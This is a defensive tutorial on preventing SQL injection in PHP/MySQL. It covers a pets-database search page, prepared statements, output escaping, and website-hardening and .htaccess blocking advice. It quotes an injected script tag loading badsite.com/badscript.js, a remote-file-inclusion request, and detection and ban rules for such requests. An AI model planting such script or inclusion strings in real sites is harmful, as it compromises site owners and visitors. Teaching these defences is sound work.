<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Language" content="en-us">
<title>Pets Database Search Page</title>
</head>

<body>

<?php

$ResultCount = 0;

// ACCUMULATES THE ROWS OF THE HTML OUTPUT TABLE. IT STARTS WITH THE TOP ROW COLUMN HEADINGS.
$ResultTableRows = 
 '<tr style="font-weight:bold;">
  <td>Id</td>
  <td>Name</td>
  <td>Owner</td>
  <td>Species</td>
  <td>Sx</td>
  <td>Birth</td>
  <td>Death</td>
 </tr>
 '; 

/*
The following variable validations have the side-effect of prohibiting the potentially dangerous 
quote (and other) chars, so this validation is a secondary defense against SQL Injection. 

The allowed characters in the preg_match() example are ones legal in regular expressions
because I wanted to use regex for testing queries on the pets database.
For normal use on a web page, the set of allowed characters would usually be much more restrictive.

My validation strategy: each variable starts as unset. That protects against register_globals=On.
It also allows using an isset() test on it, as a flag, later.
The variable only becomes set if the user-provided value for it was acceptable.

Using trim() to remove leading/trailing whitespace is optional, 
but useful for variables where accidental user-submitted whitespace 
could cause a search to fail when it really should have succeeded
except for irrelevant whitespace that caused two strings not to match exactly.
*/

unset($FindOwner);
if(isset($_POST['ownername']))
{
 $_POST['ownername'] = trim($_POST['ownername']);
 if(preg_match('/^[a-zA-Z0-9^$.*+\[\]{,}]{1,32}$/u', $_POST['ownername']))
  $FindOwner = $_POST['ownername'];
}

unset($FindSpecies);
if(isset($_POST['petspecies']))
{
 $_POST['petspecies'] = trim($_POST['petspecies']);
 if(preg_match('/^[a-zA-Z0-9^$.*+\[\]{,}]{1,24}$/u', $_POST['petspecies']))
  $FindSpecies = $_POST['petspecies'];
}

/*
For the numeric variable, this example shows an alternative validation strategy:
Give the variable an initial default value that can be used if the user input is unacceptable.
That can also be done with string variables, but makes no sense for the 2 variables above.

All incoming $_GET/POST variables, even numeric ones, initially arrive as strings.
*/

$RowsLimit = 100;
if(isset($_POST['rowslimit']))
{
 $_POST['rowslimit'] = trim($_POST['rowslimit']);
 if(preg_match('/^[0-9]{1,4}$/u', $_POST['rowslimit']))
 {
  settype($_POST['rowslimit'], 'int');
  if(($_POST['rowslimit'] > 0) && ($_POST['rowslimit'] <= 1000))
   $RowsLimit = (int)$_POST['rowslimit'];
 }
}

// IF WE HAVE LEGAL SEARCH CRITERIA FOR BOTH REQUIRED FIELDS, DO THE SEARCH.
if(isset($FindOwner) && isset($FindSpecies))
{
 require($_SERVER['DOCUMENT_ROOT'] . '/config.php');
 if(mysql_connect($server, $user, $password) && mysql_select_db($database)) 
 {
  $query = sprintf("SELECT * FROM `pets` WHERE `owner` REGEXP '%s' AND `species` REGEXP '%s' LIMIT %d", 
   mysql_real_escape_string($FindOwner), 
   mysql_real_escape_string($FindSpecies),
   (int)$RowsLimit);
  
  if($result = mysql_query($query))
  {
   while($row = mysql_fetch_array($result, MYSQL_ASSOC))
   {
    $ResultCount++;
    $ResultTableRows .=  
     "<tr>\n" .
     '<td>' . htmlentities($row['id'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['name'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['owner'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['species'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['sx'], ENT_QUOTES) . "</td>\n" .  
     '<td>' . htmlentities($row['birth'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['death'], ENT_QUOTES) . "</td>\n" . 
     "</tr>\n";
   } 
   mysql_free_result($result);
  }
  mysql_close();
 }
}
?>

<form method="post" action="">
<p>Enter criteria to search for:</p>
<p>Owner name (or partial): 
<input id="ownername" name="ownername" size="50" value="<?php if(isset($FindOwner)) echo $FindOwner; ?>"></p>
<p>Species to search for  : 
<input id="petspecies" name="petspecies" size="50" value="<?php if(isset($FindSpecies)) echo $FindSpecies; ?>"></p>
<p><input type="submit" value="Submit"></p>
</form>

<?php
if(!empty($_POST))
{
 echo '<h2>', $ResultCount, ' results:</h2>
  <table cellpadding="4" cellspacing="0" border="1" align="left" width="100%">', 
  $ResultTableRows, 
  '</table>';
}
?>

</body>
</html>

2) Example to process form input, using the (new) mysqli extension methods:

These mysqli methods are even safer. This block of code replaces the equivalent block in the example page code above.
if(isset($FindOwner) && isset($FindSpecies))
{
 require($_SERVER['DOCUMENT_ROOT'] . '/config.php');
 if($mysqli = new mysqli($server, $user, $password, $database))
 {
  if($stmt = $mysqli->prepare('SELECT * FROM `pets` WHERE `owner` REGEXP ? AND `species` REGEXP ? LIMIT ?')) 
  {
   if($stmt->bind_param('ssi', $FindOwner, $FindSpecies, $RowsLimit))
   {
    if($stmt->execute())
    {
     if($stmt->bind_result($id, $name, $owner, $species, $sx, $birth, $death))
     {
      while($stmt->fetch())
      {
       $ResultCount++;
       $ResultTableRows .=  
        "<tr>\n" .
        '<td>' . htmlentities($id, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($name, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($owner, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($species, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($sx, ENT_QUOTES) . "</td>\n" .  
        '<td>' . htmlentities($birth, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($death, ENT_QUOTES) . "</td>\n" . 
        "</tr>\n";
      }
     }
    }
   } 
   $stmt->close();
  }
 }
 $mysqli->close();
}

Other features of the code examples

Validate and/or sanitize all user-submitted values

For every data item that you'll be receiving from your users, make a list of all its possible legitimate values. If such a list isn't possible (it often isn't), define as completely as possible the attributes that all its possible legitimate values would have. For example, if the input is supposed to be an integer, it must consist of only digits. If it is supposed to be a name, it should contain only alphabetic characters and no punctuation except perhaps a hyphen or apostrophe (unfortunately, allowing apostrophes opens a security hole). In all cases, you can apply a length test, too. Incoming values should not be excessively long. Make your rules as restrictive as possible so that only legitimate values can pass the test.
In whatever programming language you use, build a regular expression (or a substitute using another coding method) based on the rules you just created, for testing the incoming value. If the incoming value passes the test (i.e. it's legitimate and reasonable for what your script expects it to be), you can proceed to use the value in your database query. If it doesn't pass the test, don't do the query. Reject the form submission.
That is called data validation. It is a standard best practice for dealing with all data that comes from outside a script. The reasons, and various validation methods, including a more modern method (PHP filter) for validating numbers and other variable types, are described more thoroughly in my article on preventing Remote File Inclusion, another type of security vulnerability.
In addition to having minimal examples of input validation, just enough to show the principle, the example scripts above demonstrate that it can be easier to implement validation if you don't use the incoming $_POST values directly. Instead, there are internal variables for holding the values. An incoming $_POST value is transferred to its internal variable only if it passes the validation tests. This strategy makes it easy to give the internal variable a safe default value which (depending on the application) can be usable when the incoming value doesn't validate. 
Sometimes, if an incoming value doesn't validate, a programmer chooses to do some text processing on it, such as removing or transforming illegal characters, to make it pass the validation. That is called data sanitization, or cleaning, or scrubbing. In some applications, that can be a sensible and reasonable thing to do, but in many applications it's not. After you transform the user's input, the end result is likely not to be what the user intended, anyway, and if the input was malicious, there's no point trying to help them. Just reject the submission.
Data validation is critically important in all languages, when dealing with all database programs. Unfortunately, it's not enough to ensure security by itself. 

Use prepared statements of parameterized queries with placeholders for bound variables

In Example 2) above, that is done by this line:
$mysqli->prepare('SELECT * FROM `pets` WHERE `owner` REGEXP ? AND `species` REGEXP ? LIMIT ?')
The question marks are placeholders for three pieces of not-yet-known data which are the "parameters" in this parameterized query. "Parameterized" means PHP considers the code and data parts of the query to be distinct and separate.
PHP compiles this into a prepared statement (or you could call it a pre-prepared query) even though the data parts are not yet known.
It then binds three variables as data into the locations of the placeholder question marks, but only after casting (converting) them to the specified data types. 'ssi' means string, string, integer:
$stmt->bind_param('ssi', $FindOwner, $FindSpecies, $RowsLimit)
The data items that replace the question marks will be treated as data even if they happen to look like (or are) SQL code. Because PHP knew ahead of time which part of the query is the code, it cannot be confused by data trying to masquerade as code.
Contrast that with the old-school method of creating a query by string concatenation: the query didn't exist until after the code and data were combined into a text string, and PHP had to try to parse the text string to create a query. Obviously, mistakes could be made.
Example 1) above does not have these protections and cannot be revised to have them. It creates the query after code and data have been combined into a text string, so it has that inherent weakness. The protection of having code and data kept separate is provided by the newer mysqli database extension, which is why it is so much better.

Keep database connection data in a separate file

The examples read database connection data (username, password) from a config.php file, for two reasons:
  1. All scripts that need the connection data can read it from that one file. If it is ever necessary to revise the information (such as to change the database password), it only needs to be done in that one file.
     
  2. If a server misconfiguration causes the PHP interpreter to fail, a web page is served with its PHP code still in it. If the connection data is in the file, it gets printed on the web page, an obvious security hazard. By contrast, if the connection data is in a separate file and included with the PHP require() function, the PHP failure causes require() not to execute, and the connection data remains safe.
The config file can be named anything, but it should have a .php extension, not .txt, .inc, or anything else. That is because when a .php file is served (and PHP is functioning properly), the PHP code is stripped out (while being executed) before the page is sent. Thus, even if someone manages to request your config.php file with their browser, it will just be a blank page. However, if your file is called something like config.txt, config.inc, or config.db, it does not have that PHP protection. The full text will be sent to the browser.
Since config.php has the PHP protection against disclosure, additional security measures are optional under normal circumstances, but they include: store config.php outside public_html, or in a password-protected directory, or protect it with an .htaccess rule. On a Linux server that uses suPHP, you can set its file permissions to 0640 or even 0600 to protect it from being read by another user on your shared server.
An example config.php file:
<?php
$server = 'localhost';
$user = 'YourMySQLUser';
$password = '5m#Cnx(6hjNG';
$database = 'testpets';
?>
Example .htaccess protection for it:
<Files config.php>
order allow,deny
deny from all
</Files>

Use the htmlentities() function on any text that will be output to a web page

As the example code retrieves text from the database, it passes it through the htmlentities() function before outputting it to the web page. This is a best practice when handling any text that might contain HTML tags that are not, however, meant to be interpreted as HTML code when a browser receives them. Instead, they are meant to be displayed on the page, as text.
Here is an example of what htmlentities() does. An HTML script tag looks like this:
<script>
If your PHP code pulls that text out of your database and places it on the web page as-is, a browser that receives the web page will not display the text on the page. Instead, it thinks it marks the beginning of some JavaScript it is supposed to run.  
However, if your PHP code uses htmlentities("<script>") to put the text on the web page, the result is this: 
&lt;script&gt;
When a browser receives that in a web page, it knows that it's not a <script> tag. Instead, it knows that it's supposed to put the text "<script>" on the page.
That might not seem like a very big deal, especially if your database data never contains HTML tags, anyway, but there is a situation where it can be quite important: what if, in spite of your best efforts, you do become the victim of an SQL Injection attack, and somebody manages to inject malicious script code into your database tables, where there previously weren't any HTML tags to worry about? 
If your PHP code was putting the text on the page as-is, it will now output the malicious script, as-is, like this:
<script type="text/javascript" src="http://badsite.com/badscript.js"></script>
Suddenly, your page is infected with a malicious JavaScript, and visitors to your site will start getting warnings from their antivirus programs.  
However, if your PHP code was passing the output through htmlentities(), it will output the malicious script to your web page like this:
&lt;script type=&quot;text/javascript&quot; src=&quot;http://badsite.com/badscript.js&quot;&gt;&lt;/script&gt;
Visitors to your site will see that text on the page, but their browsers will not interpret it as JavaScript code as the hackers intended, and they won't get warnings from their antivirus programs. 
htmlentities() rendered the output harmless EVEN AFTER an attack put malware in the database!

More defenses against SQL Injection and database corruption

Limited user privileges

Whenever you connect to a database, you must do it as a "database user". The "user" is one of the pieces of information in your connection data. You don't have to, and should not, connect to all your databases as the same user. Instead, create a different user for each database. You should not connect to any of your databases as your cPanel user. You can create as many MySQL users as you want.
Whenever you need to do a database task in a PHP script, you should do it as a user who is only authorized to access that one database, and who has the least possible privileges required to accomplish the task. For example, if your script only searches a database and outputs results on the page, the user for doing that should have read-only privileges for the database.
The reason is that if an SQL Injection attack succeeds in corrupting a query, it can only do as much damage as the hijacked user is authorized to do. If it tries to insert new data into a table, but the user doesn't have INSERT privileges, it will fail.
How to manage MySQL users in cPanel.

Ban SQL Injection attacks in .htaccess

You can use Apache .htaccess to ban (reject, without processing) incoming requests where the HTTP query string contains SQL code or punctuation symbols that are often used in SQL code. This can help protect you from undiscovered SQL Injection vulnerabilities in applications you use but whose code you have no control over because you didn't write it.

Preventing SQL Injection in other languages and other database programs

As mentioned earlier, the principles of security discussed in this article are applicable when connecting to any database program from any scripting language, but the specifics of creating and using the connection vary widely. I've tried to mention throughout the article key words and concept phrases that would be useful in web searches to find similar articles about other languages and other database programs.
PHP has connection methods for many databases, including Microsoft SQL Server.
Some of the most severe and widespread injection attacks have been against ASP/ASP.NET, especially in combination with MSSQL and IIS. I don't have experience in ASP, ASP.NET, or MSSQL/T-SQL to draw on for creating example code, so instead I'm trying to assemble a list of links that appear to be most useful.
Microsoft offers a free downloadable program for scanning and finding SQL Injection vulnerabilities in Classic ASP VBScript source code, with instructions and links to Microsoft articles. They also describe best practices and example code for ASP.NET (plus another page about the same), and how to use the .NET Regex class for data validation in ASP.NET. 
This is the simplest and thus most understandable example of creating a parameterized query in ASP.NET that I've seen.
This demonstrates creating a parameterized query for a login page with VBScript and dynamic SQL in Classic ASP using ADODB.Connection. This, also Classic ASP, is more complex, but adds typecasting to force variables to their desired types. This does a similar thing with slightly different code.
Code snippets for parameterized queries in several different languages/environments, including Cold Fusion, Delphi, Java.

Notes

  1. My somewhat strange example code is based on the "pets" database in the MySQL Tutorial.
     
  2. You can discover whether your website is receiving SQL Injection attacks at my hack attempt identifier.

What to do NOW to protect your website

 

 

Website security precautions

Sections 1-6 are absolutely necessary. They do not require a lot of technical knowledge.

1) Maintain strong security on the computer that you use to manage your website

Someone who successfully infects your PC can use it to get into your website. That is very common.
  • On any Windows PC (does not apply to Linux, Mac) that you use to administer your website, install good quality antivirus software to keep it free of viruses and Trojan downloaders that can install spyware such as keyloggers and password-stealers. Get real-time ("on access") protection that detects malware immediately when it is received. "On-demand" scanning (such as once a day or once a week) is not good enough. Malware can do all its damage, steal your data, and even delete itself, before you get around to doing a manual file scan.
     
  • On a Windows system, once a month, while logged into your PC as an Administrator, visit Windows Update to install the latest security patches for Microsoft products, including Internet Explorer.
     
  • Keep all your internet-related software such as browsers, plug-ins, and add-ons up to date with the latest security patches. Examples are Adobe Reader, Flash, and Java. You can check whether your Firefox plugins are up to date at Mozilla Plugin Check.
     
  • Use adequate security settings in your web browser. When Internet Explorer and Firefox are first installed, their default security settings are not high enough, and most people don't change them. Set JavaScript so it is Off by default and only enabled for trusted websites that require it. Follow best practices for IE, and use the NoScript add-on in Firefox. 
     
  • On a wireless network or in a public "hot spot", your data is transmitted by radio, and it is easy for someone nearby to monitor everything you send and receive that is not encrypted. Normal web browsing on http:// websites is not encrypted, and neither is a normal FTP login. Whenever you are "working wireless", use encrypted https:// to log in to your server, and use secure FTP (SFTP) to transfer files.

2) Follow accepted best practices for your website passwords

  • Use strong passwords: 8 to 20 random upper/lower/numeric/punctuation characters.
  • Use a different password in every location.
  • Only give your password to people who must have it.
  • If you give your password to someone temporarily, change it as soon as their work is finished.
Here is an entire article about why good passwords are so important. It has a strong password generator and password input boxes where you can practice typing strong passwords accurately to get used to them.

3) Choose third party scripts carefully

Don't load your website with every cool script, gadget, feature, function, and code snippet you can find on the web. Any one of them could let a hacker into your site. Before you use something new, read its vulnerability report at Secunia.com, and do a web search on it to see if people talk about it as a security hazard. Some add-ons and templates are actually designed to be malicious. Ways to avoid those are described by the Google Blogger Team in Keeping Your Blog Secure.

4) Keep third party scripts up to date

Once you have installed a script such as WordPress, SMF, Coppermine, phpBB, or any others, find a way to make sure you are notified quickly when security updates are released. Get on a mailing list, subscribe to an RSS feed, subscribe to a forum board, create a Google Alert, whatever you need to do. When a security update is released, install it within 1 day, if possible. 

5) Use good security practices for SSH

SSH, Secure SHell, gives you command line access to your server, allowing you to execute operating system commands from a remote location. Most webhosts don't allow their shared hosting customers to use SSH at all, but a few do. Resellers and those who manage dedicated servers do have SSH.
  • If you have SSH access and you use it, its password should be exceptionally strong, 16 random characters or more. I've seen servers where the log of failed login attempts was 160MB or more, and the hackers eventually succeeded because the password wasn't strong enough.
     
  • If you have SSH access and you don't use it, disable SSH so nobody can use it. There is sometimes an SSH control switch in cPanel. For reseller accounts and dedicated servers, there is a switch in WHM. If you are a reseller or run a dedicated server on which there are multiple accounts, turn SSH off for all accounts or at least those that don't use it. If you allow SSH at all, let your users ask you to enable it for them. Most never will.

6) Don't weaken your server's file and folder permissions.

Each file and folder on your server has permissions settings that determine who can read or write that file, execute that program, or enter that folder. Your webhost initially created your webspace with secure permission settings on all files and folders.
Do not modify the permissions until you know what you're doing. Don't guess. One mistake can allow any other account on your shared server to put files on your site, or allow anyone in the world to put files there by first getting into a weaker website on your shared server and running a malicious PHP script from there.
People having trouble installing web applications on their site are sometimes told to try setting the Linux permissions to 777 (for folders) or 666 (for files). Those permission levels are sometimes necessary, but they are a hazard and should only be used for folders and files for which it's absolutely necessary and only during times when it's absolutely necessary. For example, sometimes 777 only needs to be used during installation or during configuration changes or software upgrades. At other times, the application might function just fine even if you change the permissions back to more secure settings. In other words, if you need to use insecure permissions, try to minimize the amount of time they are in effect. There is no reason to leave permission levels low all the time if you only need them to be that way occasionally. Also, if software installation instructions tell you to delete the installation script itself after use, remember to do it. If it's left on the server, someone else who knows it's there (or knows it should be there) can run it, just like you can.  
A separate article has a short explanation of permissions settings.

7) Write your own scripts securely

These precautions are also absolutely necessary, but only if you write your own program code.
  • For the language you use, find and read an overview about security: PHP, ASP.NET, Cold Fusion, ...
  • When you use an unfamiliar function for the first time, check the manual for security considerations.
  • Learn to instinctively distrust data from the outside world. Write your code so that incoming malicious input can't trick it into doing something it shouldn't. Outside data includes: incoming form submission data, HTTP query strings, cookies.
  • Learn how to prevent "Remote File Inclusion". (#1 most common security error)
  • Learn how to prevent "SQL Injection". (#2 most common security error)
  • There are lots of online resources for learning how to code securely. All it takes is a web search.
  • For PHP, use a good php.ini file for extra security, to block common attacks.

8) Block suspicious activity with .htaccess

These are extra precautions that provide an additional layer of security. If you understand what this section is talking about, the discussion and code examples should help you to put some good protections in place. If you don't understand this section, don't worry about it unless you are under constant attack and other remedies have failed.
Download and examine your raw access logs, or analyze the lines here. You will most likely find attacks of the types described in my articles. Even if the attempts are unsuccessful, your logs give early warning about what methods are being used, which gives you time to figure out how to defend against them. Here are some examples of how to block suspicious activity:
  1. Ban bad robots.
    One program often misused for automated remote file inclusion attacks is called  "libwww-perl". The RFI cannot succeed if your server refuses to serve the file, so blocking this commonly malicious User-Agent is one defense. Put the following lines in your public_html/.htaccess, in a part of the file that is not delimited by HTML-style tags like <tag></tag>: 
SetEnvIfNoCase User-Agent libwww-perl block_bad_bots
# to deny more User-Agents, copy the line above and change
# only libwww-perl, to match the new name.
deny from env=block_bad_bots

SetEnvIfNoCase does a case-insensitive test of the User-Agent against a regular expression, which in this case is "contains libwww-perl". If it matches, it sets the variable block_bad_bots. The final line says if block_bad_bots was set (i.e. if the requestor matched any of the bad robots), deny the request and send a 403 Forbidden error instead. Regardless of what the bad robot was trying to do, it won't succeed.
  1. Ban suspicious URL query strings.
    Another defense against RFI is to block all requests having the form:
    GET /index.php?inc=http://badsite.com/badscript.txt?
    The following .htaccess code blocks any request where the query string (the part after the first question mark) contains "=http://" or "=ftp://". During times when you need to use a query string of that type yourself, you can comment out the code block or enable the exception shown:
# If the next line is already in your .htaccess, you don't need to add a 2nd one.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
# Allow yourself, for SMF Forum Package Manager upgrades.
# Set it to your own IP address so you are the only one who won't be blocked.
#RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ [NC]
RewriteRule .* - [F,L]

To test: you should get a 403 Forbidden error when you try to go to:
http://yoursite.com?test=http://yoursite.com/anypage.htm
http://yoursite.com?test=ftp://yoursite.com/anypage.htm
If you have coded your pages so they use remote file includes from your own site or from some external site (such that your site receives requests, constructed by you, that have URLs in the query strings), my first advice is that you should try to stop doing that:
  • Instead of sending your own site a request that has a URL in the query string, you can put in the query string a text string that the receiving page translates into a URL after it receives it. That way, your script can't be tricked by someone who sends it a malicious URL instead of one of the legitimate ones it expects.
If you must send your own site requests that have URLs in the query strings, you can use a more complicated .htaccess to allow your own remote file inclusion requests but ban others:
# FIRST, DISALLOW QUERY STRINGS CONTAINING MORE INSTANCES OF http://
# THAN WE EVER USE OURSELVES, TO LIMIT THE NUMBER OF TESTS WE MUST DO LATER.
# THIS EXAMPLE ALLOWS ONLY INSTANCE PER QUERY STRING.
RewriteCond %{QUERY_STRING} (.*http(\:|%3A)(/|%2F)(/|%2F).*){2,} [NC]
RewriteRule .* - [F,L]

# NOW WE CAN TEST EACH INSTANCE AGAINST THE LIST OF SITES WE WANT TO ALLOW.
# SINCE THIS IS A NEW REWRITE RULE, WE MUST TEST AGAIN WHETHER IT CONTAINS http://
RewriteCond %{QUERY_STRING} http(\:|%3A)(/|%2F)(/|%2F) [NC]

# THEN FALL THROUGH TO THE BAN IF IT IS NOT ONE OF THE SITES IN OUR ALLOW LIST.
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site1\.com) [NC]
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site2\.com) [NC]
#ADD A LINE FOR EACH EXTERNAL SITE YOU WANT TO ALLOW TO APPEAR IN QUERY STRINGS.

RewriteRule .* - [F,L]

Allowing for more than one instance of http:// in your query strings is possible. It requires complex code that we can custom design for you if needed.
Other query string bans:
1) Malicious RFI attempts almost always have a question mark at the end of the query string. Ban any query string that contains a question mark. The first question mark (which marks the beginning of the query string) is not part of the query string, so only question marks after the first one will trigger the ban:
RewriteCond %{QUERY_STRING} (\?|%3F) [NC]
RewriteRule .* - [F,L]

2) Be creative: find other characteristics that are common in the attacks on your site but that are never present in legitimate requests. Be thorough: use every good ban rule you can think of. It is very satisfying to see an attack on your site and know that even though it only needed to trigger one ban rule to fail, there were six others in reserve that it would have triggered.
  1. Ban IP addresses responsible for suspicious activity.
    You can block IP addresses (or ranges) in .htaccess or by cPanel > Deny IP. Although such bans can be useful against IP addresses you are 100% certain will never make a legitimate request, they aren't otherwise very practical. Once a botnet starts attacking your site, the requests will come from hundreds of different IPs, and banning them all will be futile. It is much better to ban by the other characteristics of the requests.
     
See this forum thread for further discussion about using .htaccess to block malicious requests, links to websites with suggested .htaccess code for blocking such requests, and a basic introduction to help understand the Perl regular expressions that are used for pattern matching in .htaccess.

Preparations that will make hack diagnosis and cleanup easier

1) Always have a backup copy of your entire website and its databases

You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you backup monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't backup too often.

2) Turn on log archiving in cPanel now

Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. Enable archiving to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.

3) Get a complete list of your site files NOW while they are known-good

This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.

4) Explore your website and become familiar with what is there

Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.

5) Use good database connection practices in scripts:

a) Create separate MySQL users for your scripts to use

If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
  1. Go to cPanel > MySQL® Databases > Current Users.
  2. In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
  3. In Password: enter the password to use. Make it a strong one.
  4. Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
  5. Go to the Add Users To Your Databases section.
  6. In the left dropdown box, select the user you just created.
  7. In the right dropdown box, select the database you want that user to be able to connect to.
  8. Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
  9. Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.
Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...

b) Put your MySQL connection data in a well protected file

If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at http://us.php.net/mysql_connect. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.